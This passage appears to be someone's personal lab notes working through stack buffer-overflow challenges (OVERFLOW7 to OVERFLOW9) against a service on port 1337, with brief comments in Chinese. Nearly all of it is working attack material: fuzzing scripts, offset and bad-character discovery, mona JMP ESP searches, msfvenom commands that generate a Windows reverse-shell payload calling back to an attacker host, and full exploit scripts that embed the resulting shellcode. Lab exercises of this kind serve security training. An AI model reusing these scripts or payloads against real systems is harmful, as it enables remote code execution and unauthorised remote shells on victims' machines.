payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8b\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xad\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbd\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfa\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x8c\xae\xbe\xfb之后\x8d\xaf\xbf\xfc不受影响

BADCHAR: \x00\x8c\xae\xbe\xfb

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x8c\xae\xbe\xfb"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x8c\xae\xbe\xfb" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW7 "
offset = 1306
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x5f\x47\x95\x85\x83\xee\xfc\xe2\xf4\xa3\xaf\x17\x85\x5f\x47\xf5\x0c\xba\x76\x55\xe1\xd4\x17\xa5\x0e\x0d\x4b\x1e\xd7\x4b\xcc\xe7\xad\x50\xf0\xdf\xa3\x6e\xb8\x39\xb9\x3e\x3b\x97\xa9\x7f\x86\x5a\x88\x5e\x80\x77\x77\x0d\x10\x1e\xd7\x4f\xcc\xdf\xb9\xd4\x0b\x84\xfd\xbc\x0f\x94\x54\x0e\xcc\xcc\xa5\x5e\x94\x1e\xcc\x47\xa4\xaf\xcc\xd4\x73\x1e\x84\x89\x76\x6a\x29\x9e\x88\x98\x84\x98\x7f\x75\xf0\xa9\x44\xe8\x7d\x64\x3a\xb1\xf0\xbb\x1f\x1e\xdd\x7b\x46\x46\xe3\xd4\x4b\xde\x0e\x07\x5b\x94\x56\xd4\x43\x1e\x84\x8f\xce\xd1\xa1\x7b\x1c\xce\xe4\x06\x1d\xc4\x7a\xbf\x18\xca\xdf\xd4\x55\x7e\x08\x02\x2f\xa6\xb7\x5f\x47\xfd\xf2\x2c\x75\xca\xd1\x37\x0b\xe2\xa3\x58\xb8\x40\x3d\xcf\x46\x95\x85\x76\x83\xc1\xd5\x37\x6e\x15\xee\x5f\xb8\x40\xd5\x0f\x17\xc5\xc5\x0f\x07\xc5\xed\xb5\x48\x4a\x65\xa0\x92\x02\xef\x5a\x2f\x9f\x94\x75\x27\xfd\x87\x5f\x42\xac\x0c\xb9\x2d\x85\xd3\x08\x2f\x0c\x20\x2b\x26\x6a\x50\xda\x87\xe1\x89\xa0\x09\x9d\xf0\xb3\x2f\x65\x30\xfd\x11\x6a\x50\x37\x24\xf8\xe1\x5f\xce\x76\xd2\x08\x10\xa4\x73\x35\x55\xcc\xd3\xbd\xba\xf3\x42\x1b\x63\xa9\x84\x5e\xca\xd1\xa1\x4f\x81\x95\xc1\x0b\x17\xc3\xd3\x09\x01\xc3\xcb\x09\x11\xc6\xd3\x37\x3e\x59\xba\xd9\xb8\x40\x0c\xbf\x09\xc3\xc3\xa0\x77\xfd\x8d\xd8\x5a\xf5\x7a\x8a\xfc\x65\x30\xfd\x11\xfd\x23\xca\xfa\x08\x7a\x8a\x7b\x93\xf9\x55\xc7\x6e\x65\x2a\x42\x2e\xc2\x4c\x35\xfa\xef\x5f\x14\x6a\x50"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW8

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW8 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 1800 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW8 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 68433568 -> hC5h -> h5Ch

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q h5Ch -l 1800

[*] Exact match at offset 1786

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW8 "
offset = 1786
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW8 "
offset = 1786
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x1d\x1e\x2e\x2f\xc7\xc8\xee\xef

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW8 "
offset = 1786
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1c\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2d\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc6\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xed\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x1d\x2e\xc7\xee之后\x1e\x2f\xc8\xef不受影响

BADCHAR: \x00\x1d\x2e\xc7\xee

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x1d\x2e\xc7\xee"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x1d\x2e\xc7\xee" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW8 "
offset = 1786
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xb8\xf3\x53\x39\x5d\xda\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x30\x57\xdb\xa8\x4a\xb0\x99\x53\xb2\x41\xfe\xda\x57\x70\x3e\xb8\x1c\x23\x8e\xca\x70\xc8\x65\x9e\x60\x5b\x0b\x37\x87\xec\xa6\x61\xa6\xed\x9b\x52\xa9\x6d\xe6\x86\x09\x4f\x29\xdb\x48\x88\x54\x16\x18\x41\x12\x85\x8c\xe6\x6e\x16\x27\xb4\x7f\x1e\xd4\x0d\x81\x0f\x4b\x05\xd8\x8f\x6a\xca\x50\x86\x74\x0f\x5c\x50\x0f\xfb\x2a\x63\xd9\x35\xd2\xc8\x24\xfa\x21\x10\x61\x3d\xda\x67\x9b\x3d\x67\x70\x58\x3f\xb3\xf5\x7a\xe7\x30\xad\xa6\x19\x94\x28\x2d\x15\x51\x3e\x69\x3a\x64\x93\x02\x46\xed\x12\xc4\xce\xb5\x30\xc0\x8b\x6e\x58\x51\x76\xc0\x65\x81\xd9\xbd\xc3\xca\xf4\xaa\x79\x91\x90\x1f\xb0\x29\x61\x08\xc3\x5a\x53\x97\x7f\xf4\xdf\x50\xa6\x03\x1f\x4b\x1e\x9b\xde\x74\x5f\xb2\x24\x20\x0f\xac\x8d\x49\xc4\x2c\x31\x9c\x4b\x7c\x9d\x4f\x2c\x2c\x5d\x20\xc4\x26\x52\x1f\xf4\x49\xb8\x08\x9f\xb0\x2b\x3d\x71\x90\xcb\x29\x73\xe4\x0e\x93\xfa\x02\x7a\xf3\xaa\x9d\x13\x6a\xf7\x55\x85\x73\x2d\x10\x85\xf8\xc2\xe5\x48\x09\xae\xf5\x3d\xf9\xe5\xa7\xe8\x06\xd0\xcf\x77\x94\xbf\x0f\xf1\x85\x17\x58\x56\x7b\x6e\x0c\x4a\x22\xd8\x32\x97\xb2\x23\xf6\x4c\x07\xad\xf7\x01\x33\x89\xe7\xdf\xbc\x95\x53\xb0\xea\x43\x0d\x76\x45\x22\xe7\x20\x3a\xec\x6f\xb4\x70\x2f\xe9\xb9\x5c\xd9\x15\x0b\x09\x9c\x2a\xa4\xdd\x28\x53\xd8\x7d\xd6\x8e\x58\x8d\x9d\x92\xc9\x06\x78\x47\x48\x4b\x7b\xb2\x8f\x72\xf8\x36\x70\x81\xe0\x33\x75\xcd\xa6\xa8\x07\x5e\x43\xce\xb4\x5f\x46"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW9

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW9 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 1600 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1600

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW9 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 35794234 -> 5yB4 -> 4By5

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4By5 -l 1600

[*] Exact match at offset 1514

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW9 "
offset = 1514
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW9 "
offset = 1514
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x04\x05\x3e\x3f\xe1\xe2

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW9 "
offset = 1514
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x03\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3d\x3d\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97